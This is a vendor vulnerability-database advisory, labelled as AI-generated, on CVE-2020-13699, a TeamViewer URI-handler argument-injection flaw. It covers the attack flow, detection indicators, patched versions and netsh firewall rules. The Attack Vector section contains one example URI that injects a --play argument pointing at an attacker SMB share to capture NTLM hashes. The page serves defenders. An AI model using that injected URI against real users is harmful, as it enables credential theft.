The SentinelOne Annual Threat Report - A Defenders Guide from the FrontlinesThe SentinelOne Annual Threat ReportGet the Report
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2020-13699

CVE-2020-13699: TeamViewer Auth Bypass Vulnerability

CVE-2020-13699 is an authentication bypass vulnerability in TeamViewer Desktop for Windows that allows attackers to launch TeamViewer with malicious parameters and capture NTLM hashes for credential theft. This article covers the technical details, affected versions, impact, and available patches.

Published: March 4, 2026

CVE-2020-13699 Overview

CVE-2020-13699 is an Argument Injection vulnerability in TeamViewer Desktop for Windows that stems from improper quoting of custom URI handlers. This security flaw allows attackers to craft malicious websites that can launch TeamViewer with arbitrary parameters, potentially leading to NTLM authentication request relay attacks or hash capture for offline password cracking.

Critical Impact

An attacker can force a victim to send NTLM authentication requests by simply visiting a malicious website, enabling credential theft through relay attacks or offline hash cracking.

Affected Products

  • TeamViewer Desktop for Windows versions before 15.8.3
  • TeamViewer versions 8.x, 9.x, 10.x, 11.x, 12.x, 13.x, and 14.x (prior to patched versions)
  • Microsoft Windows (all versions running vulnerable TeamViewer instances)

Discovery Timeline

  • July 29, 2020 - CVE-2020-13699 published to NVD
  • November 21, 2024 - Last updated in NVD database

Technical Details for CVE-2020-13699

Vulnerability Analysis

This vulnerability exists because TeamViewer Desktop for Windows fails to properly quote its custom URI handlers when processing parameters. The flaw is classified under CWE-88 (Improper Neutralization of Argument Delimiters in a Command), commonly known as Argument Injection.

When a user visits a malicious website, the attacker can construct a specially crafted URI that triggers TeamViewer to launch with arbitrary parameters. The vulnerability specifically affects the --play parameter handling, which can be abused to initiate outbound SMB connections to attacker-controlled servers.

The attack requires user interaction—the victim must visit a malicious webpage—but no authentication or special privileges are required from the attacker's perspective. Once triggered, the attack can lead to full compromise of user credentials through NTLM relay or hash capture techniques.

Root Cause

The root cause is inadequate input sanitization in the URI handler registration for TeamViewer. The application registers multiple custom URI schemes (teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1, and tvvpn1) without proper quoting of parameters passed through these handlers.

When Windows processes these URI schemes, it passes the entire URI string to TeamViewer. Without proper quoting, an attacker can inject additional command-line arguments that the application will interpret as legitimate parameters.

Attack Vector

The attack is network-based and requires user interaction. An attacker hosts a malicious website containing a crafted iframe or link with a TeamViewer URI scheme. The attack flow is as follows:

  1. The attacker creates a malicious webpage containing a URI such as teamviewer10: --play \\attacker-server\share\file
  2. When the victim visits the page, the browser prompts to open TeamViewer
  3. If the victim accepts, TeamViewer launches with the injected --play parameter pointing to an attacker-controlled SMB share
  4. TeamViewer attempts to access the remote share, automatically sending the victim's NTLM credentials
  5. The attacker can relay these credentials to other services or capture the hash for offline cracking

The vulnerability affects multiple URI handlers, expanding the attack surface significantly and providing attackers with numerous vectors to exploit this weakness.

Detection Methods for CVE-2020-13699

Indicators of Compromise

  • Unexpected outbound SMB (port 445) connections to external IP addresses from TeamViewer processes
  • TeamViewer process launched with unusual command-line arguments, particularly the --play parameter with UNC paths
  • Browser logs showing navigation to TeamViewer URI schemes from untrusted domains
  • Windows event logs indicating SMB authentication attempts to unknown external hosts

Detection Strategies

  • Monitor process creation events for TeamViewer.exe with suspicious command-line arguments containing UNC paths or the --play parameter
  • Implement network traffic analysis to detect outbound SMB traffic to non-corporate IP addresses
  • Deploy endpoint detection rules to alert on TeamViewer processes initiating connections to external SMB shares
  • Configure web proxies to log and alert on pages attempting to invoke TeamViewer URI schemes

Monitoring Recommendations

  • Enable verbose logging for TeamViewer application activity and monitor for anomalous connection attempts
  • Implement SIEM correlation rules to detect the combination of browser-initiated TeamViewer launches followed by outbound SMB traffic
  • Review DNS logs for resolution of unusual hostnames associated with SMB share access
  • Monitor Windows Security Event ID 4648 (explicit credential logon) events correlated with TeamViewer process activity

How to Mitigate CVE-2020-13699

Immediate Actions Required

  • Update TeamViewer immediately to version 15.8.3 or later for version 15.x installations
  • Apply appropriate patches for legacy versions: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, or 14.7.48350
  • Block outbound SMB traffic (port 445) at the perimeter firewall for workstations running TeamViewer
  • Educate users about the risks of clicking "Open" when prompted by browsers for external application handlers

Patch Information

TeamViewer has released security patches addressing this vulnerability across all supported product versions. The fixed versions properly quote URI handler parameters to prevent argument injection. Refer to the TeamViewer Security Announcement for complete patch details.

Version BranchFixed Version
15.x15.8.3
14.7.x14.7.48350
14.2.x14.2.56676
13.x13.2.36220
12.x12.0.258869
11.x11.0.258870
10.x10.0.258873
9.x9.0.258860
8.x8.0.258861

Workarounds

  • Disable or unregister TeamViewer URI handlers in the Windows registry if immediate patching is not possible
  • Implement Windows Firewall rules to block outbound SMB connections from the TeamViewer executable
  • Configure Group Policy to prevent browsers from launching external applications without explicit user confirmation
  • Consider network segmentation to prevent workstations from initiating direct SMB connections to external networks
bash
# Windows Firewall rule to block outbound SMB from TeamViewer
netsh advfirewall firewall add rule name="Block TeamViewer SMB" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles%\TeamViewer\TeamViewer.exe"
netsh advfirewall firewall add rule name="Block TeamViewer SMB x86" dir=out action=block protocol=tcp remoteport=445 program="%ProgramFiles(x86)%\TeamViewer\TeamViewer.exe"

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeAuth Bypass

  • Vendor/TechTeamviewer

  • SeverityHIGH

  • CVSS Score8.8

  • EPSS Probability72.89%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityHigh
  • AvailabilityHigh
  • CWE References
  • CWE-88
  • Technical References
  • Jeff's CVE Description
  • Vendor Resources
  • TeamViewer Security Announcement
  • Related CVEs
  • CVE-2026-23572: TeamViewer Auth Bypass Vulnerability

  • CVE-2026-23568: TeamViewer DEX Information Disclosure

  • CVE-2026-23563: TeamViewer DEX Privilege Escalation Flaw

  • CVE-2026-23566: TeamViewer DEX Log Injection Vulnerability
Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English